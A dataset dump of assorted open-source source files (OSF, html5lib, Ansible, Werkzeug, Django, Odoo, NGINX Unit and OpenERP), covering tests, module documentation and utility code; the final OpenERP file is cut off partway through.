repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
rdhyee/osf.io | scripts/osfstorage/glacier_inventory.py | 18 | 1122 | #!/usr/bin/env python
# encoding: utf-8
"""Begin retrieve inventory job on Glacier vault. Should be run in conjunction
with `glacier_audit.py`.
"""
import logging
import datetime
from boto.glacier.layer2 import Layer2
from framework.celery_tasks import app as celery_app
from scripts import utils as scripts_utils
from scripts.osfstorage import settings as storage_settings
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
scripts_utils.add_file_logger(logger, __file__)
def get_vault():
layer2 = Layer2(
aws_access_key_id=storage_settings.AWS_ACCESS_KEY,
aws_secret_access_key=storage_settings.AWS_SECRET_KEY,
)
return layer2.get_vault(storage_settings.GLACIER_VAULT)
def main():
vault = get_vault()
job = vault.retrieve_inventory_job(
description='glacier-audit-{}'.format(datetime.datetime.utcnow().strftime('%c')),
sns_topic=storage_settings.AWS_SNS_ARN,
)
logger.info('Started retrieve inventory job with id {}'.format(job.id))
@celery_app.task(name='scripts.osfstorage.glacier_inventory')
def run_main():
main()
| apache-2.0 |
TaskEvolution/Task-Coach-Evolution | taskcoach/taskcoachlib/thirdparty/html5lib/html5lib/tests/test_stream.py | 4 | 5732 | from __future__ import absolute_import, division, unicode_literals
from . import support # flake8: noqa
import unittest
import codecs
from io import BytesIO
from html5lib.inputstream import (BufferedStream, HTMLInputStream,
HTMLUnicodeInputStream, HTMLBinaryInputStream)
class BufferedStreamTest(unittest.TestCase):
def test_basic(self):
s = b"abc"
fp = BufferedStream(BytesIO(s))
read = fp.read(10)
assert read == s
def test_read_length(self):
fp = BufferedStream(BytesIO(b"abcdef"))
read1 = fp.read(1)
assert read1 == b"a"
read2 = fp.read(2)
assert read2 == b"bc"
read3 = fp.read(3)
assert read3 == b"def"
read4 = fp.read(4)
assert read4 == b""
def test_tell(self):
fp = BufferedStream(BytesIO(b"abcdef"))
read1 = fp.read(1)
assert fp.tell() == 1
read2 = fp.read(2)
assert fp.tell() == 3
read3 = fp.read(3)
assert fp.tell() == 6
read4 = fp.read(4)
assert fp.tell() == 6
def test_seek(self):
fp = BufferedStream(BytesIO(b"abcdef"))
read1 = fp.read(1)
assert read1 == b"a"
fp.seek(0)
read2 = fp.read(1)
assert read2 == b"a"
read3 = fp.read(2)
assert read3 == b"bc"
fp.seek(2)
read4 = fp.read(2)
assert read4 == b"cd"
fp.seek(4)
read5 = fp.read(2)
assert read5 == b"ef"
def test_seek_tell(self):
fp = BufferedStream(BytesIO(b"abcdef"))
read1 = fp.read(1)
assert fp.tell() == 1
fp.seek(0)
read2 = fp.read(1)
assert fp.tell() == 1
read3 = fp.read(2)
assert fp.tell() == 3
fp.seek(2)
read4 = fp.read(2)
assert fp.tell() == 4
fp.seek(4)
read5 = fp.read(2)
assert fp.tell() == 6
class HTMLUnicodeInputStreamShortChunk(HTMLUnicodeInputStream):
_defaultChunkSize = 2
class HTMLBinaryInputStreamShortChunk(HTMLBinaryInputStream):
_defaultChunkSize = 2
class HTMLInputStreamTest(unittest.TestCase):
def test_char_ascii(self):
stream = HTMLInputStream(b"'", encoding='ascii')
self.assertEqual(stream.charEncoding[0], 'ascii')
self.assertEqual(stream.char(), "'")
def test_char_utf8(self):
stream = HTMLInputStream('\u2018'.encode('utf-8'), encoding='utf-8')
self.assertEqual(stream.charEncoding[0], 'utf-8')
self.assertEqual(stream.char(), '\u2018')
def test_char_win1252(self):
stream = HTMLInputStream("\xa9\xf1\u2019".encode('windows-1252'))
self.assertEqual(stream.charEncoding[0], 'windows-1252')
self.assertEqual(stream.char(), "\xa9")
self.assertEqual(stream.char(), "\xf1")
self.assertEqual(stream.char(), "\u2019")
def test_bom(self):
stream = HTMLInputStream(codecs.BOM_UTF8 + b"'")
self.assertEqual(stream.charEncoding[0], 'utf-8')
self.assertEqual(stream.char(), "'")
def test_utf_16(self):
stream = HTMLInputStream((' ' * 1025).encode('utf-16'))
self.assertTrue(stream.charEncoding[0] in ['utf-16-le', 'utf-16-be'], stream.charEncoding)
self.assertEqual(len(stream.charsUntil(' ', True)), 1025)
def test_newlines(self):
stream = HTMLBinaryInputStreamShortChunk(codecs.BOM_UTF8 + b"a\nbb\r\nccc\rddddxe")
self.assertEqual(stream.position(), (1, 0))
self.assertEqual(stream.charsUntil('c'), "a\nbb\n")
self.assertEqual(stream.position(), (3, 0))
self.assertEqual(stream.charsUntil('x'), "ccc\ndddd")
self.assertEqual(stream.position(), (4, 4))
self.assertEqual(stream.charsUntil('e'), "x")
self.assertEqual(stream.position(), (4, 5))
def test_newlines2(self):
size = HTMLUnicodeInputStream._defaultChunkSize
stream = HTMLInputStream("\r" * size + "\n")
self.assertEqual(stream.charsUntil('x'), "\n" * size)
def test_position(self):
stream = HTMLBinaryInputStreamShortChunk(codecs.BOM_UTF8 + b"a\nbb\nccc\nddde\nf\ngh")
self.assertEqual(stream.position(), (1, 0))
self.assertEqual(stream.charsUntil('c'), "a\nbb\n")
self.assertEqual(stream.position(), (3, 0))
stream.unget("\n")
self.assertEqual(stream.position(), (2, 2))
self.assertEqual(stream.charsUntil('c'), "\n")
self.assertEqual(stream.position(), (3, 0))
stream.unget("\n")
self.assertEqual(stream.position(), (2, 2))
self.assertEqual(stream.char(), "\n")
self.assertEqual(stream.position(), (3, 0))
self.assertEqual(stream.charsUntil('e'), "ccc\nddd")
self.assertEqual(stream.position(), (4, 3))
self.assertEqual(stream.charsUntil('h'), "e\nf\ng")
self.assertEqual(stream.position(), (6, 1))
def test_position2(self):
stream = HTMLUnicodeInputStreamShortChunk("abc\nd")
self.assertEqual(stream.position(), (1, 0))
self.assertEqual(stream.char(), "a")
self.assertEqual(stream.position(), (1, 1))
self.assertEqual(stream.char(), "b")
self.assertEqual(stream.position(), (1, 2))
self.assertEqual(stream.char(), "c")
self.assertEqual(stream.position(), (1, 3))
self.assertEqual(stream.char(), "\n")
self.assertEqual(stream.position(), (2, 0))
self.assertEqual(stream.char(), "d")
self.assertEqual(stream.position(), (2, 1))
def buildTestSuite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
def main():
buildTestSuite()
unittest.main()
if __name__ == '__main__':
main()
| gpl-3.0 |
pshen/ansible | lib/ansible/modules/files/fetch.py | 27 | 4058 | # this is a virtual module that is entirely implemented server side
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: fetch
short_description: Fetches a file from remote nodes
description:
- This module works like M(copy), but in reverse. It is used for fetching
files from remote machines and storing them locally in a file tree,
organized by hostname.
version_added: "0.2"
options:
src:
description:
- The file on the remote system to fetch. This I(must) be a file, not a
directory. Recursive fetching may be supported in a later release.
required: true
default: null
aliases: []
dest:
description:
- A directory to save the file into. For example, if the I(dest)
directory is C(/backup) a I(src) file named C(/etc/profile) on host
C(host.example.com), would be saved into
C(/backup/host.example.com/etc/profile)
required: true
default: null
fail_on_missing:
version_added: "1.1"
description:
- When set to 'yes', the task will fail if the remote file cannot be
read for any reason. Prior to Ansible-2.4, setting this would only fail
if the source file was missing.
- The default was changed to "yes" in Ansible-2.4.
required: false
choices: [ "yes", "no" ]
default: "yes"
validate_checksum:
version_added: "1.4"
description:
- Verify that the source and destination checksums match after the files are fetched.
required: false
choices: [ "yes", "no" ]
default: "yes"
aliases: [ "validate_md5" ]
flat:
version_added: "1.2"
description:
- Allows you to override the default behavior of appending
hostname/path/to/file to the destination. If dest ends with '/', it
will use the basename of the source file, similar to the copy module.
Obviously this is only handy if the filenames are unique.
requirements: []
author:
- "Ansible Core Team"
- "Michael DeHaan"
notes:
- When running fetch with C(become), the M(slurp) module will also be
used to fetch the contents of the file for determining the remote
checksum. This effectively doubles the transfer size, and
depending on the file size can consume all available memory on the
remote or local hosts causing a C(MemoryError). Due to this it is
advisable to run this module without C(become) whenever possible.
- Prior to Ansible-2.4 this module would not fail if reading the remote
file was impossible unless fail_on_missing was set. In Ansible-2.4+,
playbook authors are encouraged to use fail_when or ignore_errors to
get this ability. They may also explicitly set fail_on_missing to False
to get the non-failing behaviour.
'''
EXAMPLES = '''
# Store file into /tmp/fetched/host.example.com/tmp/somefile
- fetch:
src: /tmp/somefile
dest: /tmp/fetched
# Specifying a path directly
- fetch:
src: /tmp/somefile
dest: /tmp/prefix-{{ inventory_hostname }}
flat: yes
# Specifying a destination path
- fetch:
src: /tmp/uniquefile
dest: /tmp/special/
flat: yes
# Storing in a path relative to the playbook
- fetch:
src: /tmp/uniquefile
dest: special/prefix-{{ inventory_hostname }}
flat: yes
'''
| gpl-3.0 |
josephlewis42/magpie | magpie/lib/werkzeug/posixemulation.py | 319 | 3543 | # -*- coding: utf-8 -*-
r"""
werkzeug.posixemulation
~~~~~~~~~~~~~~~~~~~~~~~
Provides a POSIX emulation for some features that are relevant to
web applications. The main purpose is to simplify support for
systems such as Windows NT that are not 100% POSIX compatible.
Currently this only implements a :func:`rename` function that
follows POSIX semantics. Eg: if the target file already exists it
will be replaced without asking.
This module was introduced in 0.6.1 and is not a public interface.
It might become one in later versions of Werkzeug.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import sys
import os
import errno
import time
import random
can_rename_open_file = False
if os.name == 'nt': # pragma: no cover
_rename = lambda src, dst: False
_rename_atomic = lambda src, dst: False
try:
import ctypes
_MOVEFILE_REPLACE_EXISTING = 0x1
_MOVEFILE_WRITE_THROUGH = 0x8
_MoveFileEx = ctypes.windll.kernel32.MoveFileExW
def _rename(src, dst):
if not isinstance(src, unicode):
src = unicode(src, sys.getfilesystemencoding())
if not isinstance(dst, unicode):
dst = unicode(dst, sys.getfilesystemencoding())
if _rename_atomic(src, dst):
return True
retry = 0
rv = False
while not rv and retry < 100:
rv = _MoveFileEx(src, dst, _MOVEFILE_REPLACE_EXISTING |
_MOVEFILE_WRITE_THROUGH)
if not rv:
time.sleep(0.001)
retry += 1
return rv
# new in Vista and Windows Server 2008
_CreateTransaction = ctypes.windll.ktmw32.CreateTransaction
_CommitTransaction = ctypes.windll.ktmw32.CommitTransaction
_MoveFileTransacted = ctypes.windll.kernel32.MoveFileTransactedW
_CloseHandle = ctypes.windll.kernel32.CloseHandle
can_rename_open_file = True
def _rename_atomic(src, dst):
ta = _CreateTransaction(None, 0, 0, 0, 0, 1000, 'Werkzeug rename')
if ta == -1:
return False
try:
retry = 0
rv = False
while not rv and retry < 100:
rv = _MoveFileTransacted(src, dst, None, None,
_MOVEFILE_REPLACE_EXISTING |
_MOVEFILE_WRITE_THROUGH, ta)
if rv:
rv = _CommitTransaction(ta)
break
else:
time.sleep(0.001)
retry += 1
return rv
finally:
_CloseHandle(ta)
except Exception:
pass
def rename(src, dst):
# Try atomic or pseudo-atomic rename
if _rename(src, dst):
return
# Fall back to "move away and replace"
try:
os.rename(src, dst)
except OSError as e:
if e.errno != errno.EEXIST:
raise
old = "%s-%08x" % (dst, random.randint(0, sys.maxint))
os.rename(dst, old)
os.rename(src, dst)
try:
os.unlink(old)
except Exception:
pass
else:
rename = os.rename
can_rename_open_file = True
| bsd-3-clause |
Richard2ndQuadrant/ansible | test/units/template/test_template_utilities.py | 152 | 4567 | # (c) 2015 Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import jinja2
from ansible.compat.tests import unittest
from ansible.template import _escape_backslashes, _count_newlines_from_end
# These are internal utility functions only needed for templating. They're
# algorithmic so good candidates for unittesting by themselves
class TestBackslashEscape(unittest.TestCase):
test_data = (
# Test backslashes in a filter arg are double escaped
dict(
template=u"{{ 'test2 %s' | format('\\1') }}",
intermediate=u"{{ 'test2 %s' | format('\\\\1') }}",
expectation=u"test2 \\1",
args=dict()
),
# Test backslashes inside the jinja2 var itself are double
# escaped
dict(
template=u"Test 2\\3: {{ '\\1 %s' | format('\\2') }}",
intermediate=u"Test 2\\3: {{ '\\\\1 %s' | format('\\\\2') }}",
expectation=u"Test 2\\3: \\1 \\2",
args=dict()
),
# Test backslashes outside of the jinja2 var are not double
# escaped
dict(
template=u"Test 2\\3: {{ 'test2 %s' | format('\\1') }}; \\done",
intermediate=u"Test 2\\3: {{ 'test2 %s' | format('\\\\1') }}; \\done",
expectation=u"Test 2\\3: test2 \\1; \\done",
args=dict()
),
# Test backslashes in a variable sent to a filter are handled
dict(
template=u"{{ 'test2 %s' | format(var1) }}",
intermediate=u"{{ 'test2 %s' | format(var1) }}",
expectation=u"test2 \\1",
args=dict(var1=u'\\1')
),
# Test backslashes in a variable expanded by jinja2 are double
# escaped
dict(
template=u"Test 2\\3: {{ var1 | format('\\2') }}",
intermediate=u"Test 2\\3: {{ var1 | format('\\\\2') }}",
expectation=u"Test 2\\3: \\1 \\2",
args=dict(var1=u'\\1 %s')
),
)
def setUp(self):
self.env = jinja2.Environment()
def tearDown(self):
pass
def test_backslash_escaping(self):
for test in self.test_data:
intermediate = _escape_backslashes(test['template'], self.env)
self.assertEquals(intermediate, test['intermediate'])
template = jinja2.Template(intermediate)
args = test['args']
self.assertEquals(template.render(**args), test['expectation'])
class TestCountNewlines(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_zero_length_string(self):
self.assertEquals(_count_newlines_from_end(u''), 0)
def test_short_string(self):
self.assertEquals(_count_newlines_from_end(u'The quick\n'), 1)
def test_one_newline(self):
self.assertEquals(_count_newlines_from_end(u'The quick brown fox jumped over the lazy dog' * 1000 + u'\n'), 1)
def test_multiple_newlines(self):
self.assertEquals(_count_newlines_from_end(u'The quick brown fox jumped over the lazy dog' * 1000 + u'\n\n\n'), 3)
def test_zero_newlines(self):
self.assertEquals(_count_newlines_from_end(u'The quick brown fox jumped over the lazy dog' * 1000), 0)
def test_all_newlines(self):
self.assertEquals(_count_newlines_from_end(u'\n' * 10), 10)
def test_mostly_newlines(self):
self.assertEquals(_count_newlines_from_end(u'The quick brown fox jumped over the lazy dog' + u'\n' * 1000), 1000)
| gpl-3.0 |
olasitarska/django | django/template/context.py | 87 | 6758 | from copy import copy
from django.utils.module_loading import import_string
# Cache of actual callables.
_standard_context_processors = None
# We need the CSRF processor no matter what the user has in their settings,
# because otherwise it is a security vulnerability, and we can't afford to leave
# this to human error or failure to read migration instructions.
_builtin_context_processors = ('django.core.context_processors.csrf',)
class ContextPopException(Exception):
"pop() has been called more times than push()"
pass
class ContextDict(dict):
def __init__(self, context, *args, **kwargs):
super(ContextDict, self).__init__(*args, **kwargs)
context.dicts.append(self)
self.context = context
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
self.context.pop()
class BaseContext(object):
def __init__(self, dict_=None):
self._reset_dicts(dict_)
def _reset_dicts(self, value=None):
builtins = {'True': True, 'False': False, 'None': None}
self.dicts = [builtins]
if value is not None:
self.dicts.append(value)
def __copy__(self):
duplicate = copy(super(BaseContext, self))
duplicate.dicts = self.dicts[:]
return duplicate
def __repr__(self):
return repr(self.dicts)
def __iter__(self):
for d in reversed(self.dicts):
yield d
def push(self, *args, **kwargs):
return ContextDict(self, *args, **kwargs)
def pop(self):
if len(self.dicts) == 1:
raise ContextPopException
return self.dicts.pop()
def __setitem__(self, key, value):
"Set a variable in the current context"
self.dicts[-1][key] = value
def __getitem__(self, key):
"Get a variable's value, starting at the current context and going upward"
for d in reversed(self.dicts):
if key in d:
return d[key]
raise KeyError(key)
def __delitem__(self, key):
"Delete a variable from the current context"
del self.dicts[-1][key]
def has_key(self, key):
for d in self.dicts:
if key in d:
return True
return False
def __contains__(self, key):
return self.has_key(key)
def get(self, key, otherwise=None):
for d in reversed(self.dicts):
if key in d:
return d[key]
return otherwise
def new(self, values=None):
"""
Returns a new context with the same properties, but with only the
values given in 'values' stored.
"""
new_context = copy(self)
new_context._reset_dicts(values)
return new_context
def flatten(self):
"""
Returns self.dicts as one dictionary
"""
flat = {}
for d in self.dicts:
flat.update(d)
return flat
def __eq__(self, other):
"""
Compares two contexts by comparing theirs 'dicts' attributes.
"""
if isinstance(other, BaseContext):
# because dictionaries can be put in different order
# we have to flatten them like in templates
return self.flatten() == other.flatten()
# if it's not comparable return false
return False
class Context(BaseContext):
"A stack container for variable context"
def __init__(self, dict_=None, autoescape=True, current_app=None,
use_l10n=None, use_tz=None):
self.autoescape = autoescape
self.current_app = current_app
self.use_l10n = use_l10n
self.use_tz = use_tz
self.render_context = RenderContext()
super(Context, self).__init__(dict_)
def __copy__(self):
duplicate = super(Context, self).__copy__()
duplicate.render_context = copy(self.render_context)
return duplicate
def update(self, other_dict):
"Pushes other_dict to the stack of dictionaries in the Context"
if not hasattr(other_dict, '__getitem__'):
raise TypeError('other_dict must be a mapping (dictionary-like) object.')
self.dicts.append(other_dict)
return other_dict
class RenderContext(BaseContext):
"""
A stack container for storing Template state.
RenderContext simplifies the implementation of template Nodes by providing a
safe place to store state between invocations of a node's `render` method.
The RenderContext also provides scoping rules that are more sensible for
'template local' variables. The render context stack is pushed before each
template is rendered, creating a fresh scope with nothing in it. Name
resolution fails if a variable is not found at the top of the RequestContext
stack. Thus, variables are local to a specific template and don't affect the
rendering of other templates as they would if they were stored in the normal
template context.
"""
def __iter__(self):
for d in self.dicts[-1]:
yield d
def has_key(self, key):
return key in self.dicts[-1]
def get(self, key, otherwise=None):
return self.dicts[-1].get(key, otherwise)
def __getitem__(self, key):
return self.dicts[-1][key]
# This is a function rather than module-level procedural code because we only
# want it to execute if somebody uses RequestContext.
def get_standard_processors():
from django.conf import settings
global _standard_context_processors
if _standard_context_processors is None:
processors = []
collect = []
collect.extend(_builtin_context_processors)
collect.extend(settings.TEMPLATE_CONTEXT_PROCESSORS)
for path in collect:
func = import_string(path)
processors.append(func)
_standard_context_processors = tuple(processors)
return _standard_context_processors
class RequestContext(Context):
"""
This subclass of template.Context automatically populates itself using
the processors defined in TEMPLATE_CONTEXT_PROCESSORS.
Additional processors can be specified as a list of callables
using the "processors" keyword argument.
"""
def __init__(self, request, dict_=None, processors=None, current_app=None,
use_l10n=None, use_tz=None):
Context.__init__(self, dict_, current_app=current_app,
use_l10n=use_l10n, use_tz=use_tz)
if processors is None:
processors = ()
else:
processors = tuple(processors)
updates = dict()
for processor in get_standard_processors() + processors:
updates.update(processor(request))
self.update(updates)
| bsd-3-clause |
Daniel-CA/odoo | addons/web_graph/controllers/main.py | 32 | 3598 | from openerp import http
import simplejson
from openerp.tools import ustr
from openerp.http import request, serialize_exception as _serialize_exception
from cStringIO import StringIO
from collections import deque
try:
import xlwt
except ImportError:
xlwt = None
class TableExporter(http.Controller):
@http.route('/web_graph/check_xlwt', type='json', auth='none')
def check_xlwt(self):
return xlwt is not None
@http.route('/web_graph/export_xls', type='http', auth="user")
def export_xls(self, data, token):
jdata = simplejson.loads(data)
nbr_measures = jdata['nbr_measures']
workbook = xlwt.Workbook()
worksheet = workbook.add_sheet(jdata['title'][:30])
header_bold = xlwt.easyxf("font: bold on; pattern: pattern solid, fore_colour gray25;")
header_plain = xlwt.easyxf("pattern: pattern solid, fore_colour gray25;")
bold = xlwt.easyxf("font: bold on;")
# Step 1: writing headers
headers = jdata['headers']
# x,y: current coordinates
# carry: queue containing cell information when a cell has a >= 2 height
# and the drawing code needs to add empty cells below
x, y, carry = 1, 0, deque()
for i, header_row in enumerate(headers):
worksheet.write(i,0, '', header_plain)
for header in header_row:
while (carry and carry[0]['x'] == x):
cell = carry.popleft()
for i in range(nbr_measures):
worksheet.write(y, x+i, '', header_plain)
if cell['height'] > 1:
carry.append({'x': x, 'height':cell['height'] - 1})
x = x + nbr_measures
style = header_plain if 'expanded' in header else header_bold
for i in range(header['width']):
worksheet.write(y, x + i, header['title'] if i == 0 else '', style)
if header['height'] > 1:
carry.append({'x': x, 'height':header['height'] - 1})
x = x + header['width'];
while (carry and carry[0]['x'] == x):
cell = carry.popleft()
for i in range(nbr_measures):
worksheet.write(y, x+i, '', header_plain)
if cell['height'] > 1:
carry.append({'x': x, 'height':cell['height'] - 1})
x = x + nbr_measures
x, y = 1, y + 1
# Step 2: measure row
if nbr_measures > 1:
worksheet.write(y,0, '', header_plain)
for measure in jdata['measure_row']:
style = header_bold if measure['is_bold'] else header_plain
worksheet.write(y, x, measure['text'], style);
x = x + 1
y = y + 1
# Step 3: writing data
x = 0
for row in jdata['rows']:
worksheet.write(y, x, row['indent'] * ' ' + ustr(row['title']), header_plain)
for cell in row['cells']:
x = x + 1
if cell.get('is_bold', False):
worksheet.write(y, x, cell['value'], bold)
else:
worksheet.write(y, x, cell['value'])
x, y = 0, y + 1
response = request.make_response(None,
headers=[('Content-Type', 'application/vnd.ms-excel'),
('Content-Disposition', 'attachment; filename=table.xls;')],
cookies={'fileToken': token})
workbook.save(response.stream)
return response
| agpl-3.0 |
nginx/unit | test/test_variables.py | 1 | 4067 | from unit.applications.proto import TestApplicationProto
class TestVariables(TestApplicationProto):
prerequisites = {}
def setup_method(self):
assert 'success' in self.conf(
{
"listeners": {"*:7080": {"pass": "routes/$method"}},
"routes": {
"GET": [{"action": {"return": 201}}],
"POST": [{"action": {"return": 202}}],
"3": [{"action": {"return": 203}}],
"4*": [{"action": {"return": 204}}],
"blahGET}": [{"action": {"return": 205}}],
"5GET": [{"action": {"return": 206}}],
"GETGET": [{"action": {"return": 207}}],
"localhost": [{"action": {"return": 208}}],
},
},
), 'configure routes'
def conf_routes(self, routes):
assert 'success' in self.conf(routes, 'listeners/*:7080/pass')
def test_variables_method(self):
assert self.get()['status'] == 201, 'method GET'
assert self.post()['status'] == 202, 'method POST'
def test_variables_uri(self):
self.conf_routes("\"routes$uri\"")
assert self.get(url='/3')['status'] == 203, 'uri'
assert self.get(url='/4*')['status'] == 204, 'uri 2'
assert self.get(url='/4%2A')['status'] == 204, 'uri 3'
def test_variables_host(self):
self.conf_routes("\"routes/$host\"")
def check_host(host, status=208):
assert (
self.get(headers={'Host': host, 'Connection': 'close'})[
'status'
]
== status
)
check_host('localhost')
check_host('localhost.')
check_host('localhost:7080')
check_host('.localhost', 404)
check_host('www.localhost', 404)
check_host('localhost1', 404)
def test_variables_many(self):
self.conf_routes("\"routes$uri$method\"")
assert self.get(url='/5')['status'] == 206, 'many'
self.conf_routes("\"routes${uri}${method}\"")
assert self.get(url='/5')['status'] == 206, 'many 2'
self.conf_routes("\"routes${uri}$method\"")
assert self.get(url='/5')['status'] == 206, 'many 3'
self.conf_routes("\"routes/$method$method\"")
assert self.get()['status'] == 207, 'many 4'
self.conf_routes("\"routes/$method$uri\"")
assert self.get()['status'] == 404, 'no route'
assert self.get(url='/blah')['status'] == 404, 'no route 2'
def test_variables_replace(self):
assert self.get()['status'] == 201
self.conf_routes("\"routes$uri\"")
assert self.get(url='/3')['status'] == 203
self.conf_routes("\"routes/${method}\"")
assert self.post()['status'] == 202
self.conf_routes("\"routes${uri}\"")
assert self.get(url='/4*')['status'] == 204
self.conf_routes("\"routes/blah$method}\"")
assert self.get()['status'] == 205
def test_variables_upstream(self):
assert 'success' in self.conf(
{
"listeners": {
"*:7080": {"pass": "upstreams$uri"},
"*:7081": {"pass": "routes/one"},
},
"upstreams": {"1": {"servers": {"127.0.0.1:7081": {}}}},
"routes": {"one": [{"action": {"return": 200}}]},
},
), 'upstreams initial configuration'
assert self.get(url='/1')['status'] == 200
assert self.get(url='/2')['status'] == 404
def test_variables_invalid(self):
def check_variables(routes):
assert 'error' in self.conf(
routes, 'listeners/*:7080/pass'
), 'invalid variables'
check_variables("\"routes$\"")
check_variables("\"routes${\"")
check_variables("\"routes${}\"")
check_variables("\"routes$ur\"")
check_variables("\"routes$uriblah\"")
check_variables("\"routes${uri\"")
check_variables("\"routes${{uri}\"")
| apache-2.0 |
enapps/enapps-openerp-server | openerp/tools/misc.py | 1 | 41349 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
#.apidoc title: Utilities: tools.misc
"""
Miscelleanous tools used by OpenERP.
"""
from functools import wraps
import inspect
import subprocess
import logging
import os
import re
import smtplib
import socket
import sys
import threading
import time
import zipfile
from collections import defaultdict
from datetime import datetime
from email.MIMEText import MIMEText
from email.MIMEBase import MIMEBase
from email.MIMEMultipart import MIMEMultipart
from email.Header import Header
from email.Utils import formatdate, COMMASPACE
from email import Utils
from email import Encoders
from itertools import islice, izip
from lxml import etree
from which import which
from threading import local
try:
from html2text import html2text
except ImportError:
html2text = None
import openerp.loglevels as loglevels
import openerp.pooler as pooler
from config import config
from cache import *
# get_encodings, ustr and exception_to_unicode were originally from tools.misc.
# There are moved to loglevels until we refactor tools.
from openerp.loglevels import get_encodings, ustr, exception_to_unicode
_logger = logging.getLogger(__name__)
# List of etree._Element subclasses that we choose to ignore when parsing XML.
# We include the *Base ones just in case, currently they seem to be subclasses of the _* ones.
SKIPPED_ELEMENT_TYPES = (etree._Comment, etree._ProcessingInstruction, etree.CommentBase, etree.PIBase)
def find_in_path(name):
try:
return which(name)
except IOError:
return None
def find_pg_tool(name):
path = None
if config['pg_path'] and config['pg_path'] != 'None':
path = config['pg_path']
try:
return which(name, path=path)
except IOError:
return None
def exec_pg_command(name, *args):
prog = find_pg_tool(name)
if not prog:
raise Exception('Couldn\'t find %s' % name)
args2 = (prog,) + args
return subprocess.call(args2)
def exec_pg_command_pipe(name, *args):
prog = find_pg_tool(name)
if not prog:
raise Exception('Couldn\'t find %s' % name)
# on win32, passing close_fds=True is not compatible
# with redirecting std[in/err/out]
pop = subprocess.Popen((prog,) + args, bufsize= -1,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=(os.name=="posix"))
return (pop.stdin, pop.stdout)
def exec_command_pipe(name, *args):
prog = find_in_path(name)
if not prog:
raise Exception('Couldn\'t find %s' % name)
# on win32, passing close_fds=True is not compatible
# with redirecting std[in/err/out]
pop = subprocess.Popen((prog,) + args, bufsize= -1,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=(os.name=="posix"))
return (pop.stdin, pop.stdout)
#----------------------------------------------------------
# File paths
#----------------------------------------------------------
#file_path_root = os.getcwd()
#file_path_addons = os.path.join(file_path_root, 'addons')
def file_open(name, mode="r", subdir='addons', pathinfo=False):
"""Open a file from the OpenERP root, using a subdir folder.
Example::
>>> file_open('hr/report/timesheer.xsl')
>>> file_open('addons/hr/report/timesheet.xsl')
>>> file_open('../../base/report/rml_template.xsl', subdir='addons/hr/report', pathinfo=True)
@param name name of the file
@param mode file open mode
@param subdir subdirectory
@param pathinfo if True returns tupple (fileobject, filepath)
@return fileobject if pathinfo is False else (fileobject, filepath)
"""
import openerp.modules as addons
adps = addons.module.ad_paths
rtp = os.path.normcase(os.path.abspath(config['root_path']))
if name.replace(os.path.sep, '/').startswith('addons/'):
subdir = 'addons'
name = name[7:]
# First try to locate in addons_path
if subdir:
subdir2 = subdir
if subdir2.replace(os.path.sep, '/').startswith('addons/'):
subdir2 = subdir2[7:]
subdir2 = (subdir2 != 'addons' or None) and subdir2
for adp in adps:
try:
if subdir2:
fn = os.path.join(adp, subdir2, name)
else:
fn = os.path.join(adp, name)
fn = os.path.normpath(fn)
fo = file_open(fn, mode=mode, subdir=None, pathinfo=pathinfo)
if pathinfo:
return fo, fn
return fo
except IOError:
pass
if subdir:
name = os.path.join(rtp, subdir, name)
else:
name = os.path.join(rtp, name)
name = os.path.normpath(name)
# Check for a zipfile in the path
head = name
zipname = False
name2 = False
while True:
head, tail = os.path.split(head)
if not tail:
break
if zipname:
zipname = os.path.join(tail, zipname)
else:
zipname = tail
if zipfile.is_zipfile(head+'.zip'):
from cStringIO import StringIO
zfile = zipfile.ZipFile(head+'.zip')
try:
fo = StringIO()
fo.write(zfile.read(os.path.join(
os.path.basename(head), zipname).replace(
os.sep, '/')))
fo.seek(0)
if pathinfo:
return fo, name
return fo
except Exception:
name2 = os.path.normpath(os.path.join(head + '.zip', zipname))
pass
for i in (name2, name):
if i and os.path.isfile(i):
fo = file(i, mode)
if pathinfo:
return fo, i
return fo
if os.path.splitext(name)[1] == '.rml':
raise IOError, 'Report %s doesn\'t exist or deleted : ' %str(name)
